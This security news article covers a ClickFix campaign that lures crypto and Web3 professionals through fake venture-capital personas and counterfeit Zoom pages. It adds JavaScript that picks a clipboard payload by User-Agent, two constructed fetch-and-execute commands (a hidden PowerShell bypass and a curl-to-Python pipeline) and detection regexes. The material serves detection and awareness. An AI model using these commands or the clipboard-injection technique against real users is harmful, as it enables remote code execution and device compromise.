A malware campaign is targeting cryptocurrency and Web3 professionals with fake venture capital personas and bogus video conferencing invitations. The operation, first identified in early 2026, relies on a social-engineering technique known as ClickFix: victims are talked into running a malicious command on their own device, so the infection is carried out by the target rather than by an exploit.
Social Engineering on LinkedIn
The campaign is initiated on LinkedIn, where an individual masquerading as Mykhailo Hureiev claims to be the Co-Founder and Managing Partner of a fictional investment firm, SolidBit Capital. By referencing the target’s public work within crypto or DeFi communities, the attacker builds a false sense of trust. The conversation soon shifts to arranging a call, where victims are directed via a Calendly link to a counterfeit Zoom meeting page designed to deploy malware.
According to Moonlock analysts, the infrastructure supporting this campaign was traced back to Anatolli Bigdasch, based in Boston, Massachusetts, with the email anatollibigdasch0717[at]gmail[.]com. Beyond SolidBit Capital, two additional fake firms—MegaBit and Lumax Capital—were discovered, each featuring professional-looking websites, AI-generated team photos, and fabricated company histories.
Unmasking the ClickFix Technique
ClickFix turns a seemingly harmless interaction into a full device compromise. When a victim follows the fake Zoom or Google Meet link, they land on a page imitating a legitimate site, such as The Digital Asset Conference III or a typosquatted domain of the hedge fund publication Hedgeweek. An overlay styled as a Cloudflare CAPTCHA then asks the user to click to prove they are human.
The click itself is the trigger: the page's JavaScript silently writes a malicious command to the clipboard with navigator.clipboard.writeText(), choosing the payload by inspecting the browser's User-Agent string for the victim's operating system. The overlay then walks the victim through pasting and running the copied text as a "verification" step, so it is the user, not the browser, who executes it. On Windows the clipboard holds a hidden PowerShell command that bypasses the execution policy and runs a remote script in memory without writing it to disk; on macOS it holds a bash one-liner that fetches and runs a Python script detached from the shell, so it keeps running after the Terminal window is closed.
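As an added example (not code from the article or from Moonlock), the following JavaScript shows the two halves of the mechanism described above: the User-Agent branch an attacker page uses to pick a payload for the clipboard, and a defender-side classifier that flags clipboard or command-line text with the two shapes the article describes (PowerShell with an execution-policy bypass plus remote in-memory execution, and a curl-to-Python pipeline detached from the terminal). The User-Agent strings, the example.invalid hostnames and the command lines are constructed for illustration and are not the campaign's real indicators.

```javascript
// Added example: ClickFix payload selection by User-Agent, and a detector for
// the resulting clipboard text. All sample data below is constructed.

// Constructed User-Agent strings for the two targeted platforms.
const SAMPLE_USER_AGENTS = {
  windows: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0 Safari/537.36",
  macos: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/605.1.15",
};

// Constructed stand-ins for the two payload shapes the article describes.
// example.invalid is a reserved name and never resolves.
const SAMPLE_COMMANDS = {
  windows: 'powershell -w hidden -ep bypass -c "iex (iwr -useb http://example.invalid/verify.ps1)"',
  macos: "curl -fsSL http://example.invalid/verify.py | nohup python3 - >/dev/null 2>&1 &",
  benign: "git status",
};

// Attacker-side branch: the OS is read from the User-Agent. "Macintosh" is
// tested rather than "Mac OS X" because iPhone UAs also contain "like Mac OS X".
function osFromUserAgent(ua) {
  if (/Windows NT/i.test(ua)) return "windows";
  if (/Macintosh/i.test(ua)) return "macos";
  return "other";
}

// Returns the text the fake CAPTCHA handler would hand to
// navigator.clipboard.writeText(), or null when no payload exists for the OS.
// In a browser the real page would call writeText() here; this example only
// returns the string so it can run under Node.
function selectPayload(ua, commands = SAMPLE_COMMANDS) {
  const os = osFromUserAgent(ua);
  return commands[os] ?? null;
}

// Defender-side heuristics for the two payload shapes.
const PS_BYPASS = /powershell(\.exe)?\b[^\n]*-(ep|executionpolicy)\s+bypass/i;
const PS_DOWNLOAD = /\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|net\.webclient)\b/i;
const PS_EXEC = /\b(iex|invoke-expression)\b/i;
const SH_REMOTE_INTERP = /\b(curl|wget)\b[^\n]*\|\s*(nohup\s+)?(python3?|bash|sh)\b/i;
const SH_DETACHED = /\bnohup\b|&\s*$|\bdisown\b/i;

// Classifies a command string pasted from a web page (or seen in process
// creation telemetry). Returns the matched family, or suspicious: false.
function classifyClipboardCommand(text) {
  const t = text.trim();
  if (PS_BYPASS.test(t) && PS_DOWNLOAD.test(t) && PS_EXEC.test(t)) {
    return { suspicious: true, family: "windows-powershell-remote-inmemory", detached: /-w(indowstyle)?\s+hidden/i.test(t) };
  }
  if (SH_REMOTE_INTERP.test(t)) {
    return { suspicious: true, family: "macos-bash-remote-python", detached: SH_DETACHED.test(t) };
  }
  return { suspicious: false, family: null, detached: false };
}

// Demo: what each platform would receive, and whether the detector flags it.
for (const [name, ua] of Object.entries(SAMPLE_USER_AGENTS)) {
  const payload = selectPayload(ua);
  console.log(name, "->", JSON.stringify(classifyClipboardCommand(payload)));
}
console.log("benign ->", JSON.stringify(classifyClipboardCommand(SAMPLE_COMMANDS.benign)));
```

The classifier is deliberately narrow: it looks for the combination of an execution-policy bypass, a download cmdlet and Invoke-Expression in one line, or a download piped straight into an interpreter, which is a pattern almost no legitimate copy-and-paste instruction produces. A browser extension or endpoint agent that inspects clipboard writes or process command lines could surface either family before the victim presses Enter.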
Protective Measures and Future Outlook
Moonlock researchers analyzed two Mach-O binaries linked to the campaign. The first was a heavily obfuscated 9.3 MB file built to defeat static analysis tools. The second, a 37.6 KB unobfuscated build, carried the same core logic, which made the first sample's size look like padding and obfuscation rather than additional functionality. Both binaries were undetected by every engine on VirusTotal at the time of analysis, underlining the operation's emphasis on stealth.
Professionals in the cryptocurrency and Web3 sectors should treat unsolicited LinkedIn messages proposing investments or partnerships with suspicion. Checking the registration date of a firm's domain and looking for signs of AI generation in team photos can expose a fabricated company. Inspect meeting and scheduling links before clicking and confirm that a "Zoom" or "Calendly" link actually resolves to the vendor's own domain rather than a look-alike. Above all, never run a command in Run, PowerShell or Terminal as part of a CAPTCHA or "verification" step: no legitimate meeting-join or bot check requires it. Urgency, or pressure to move the conversation off LinkedIn, is a signal to disengage.
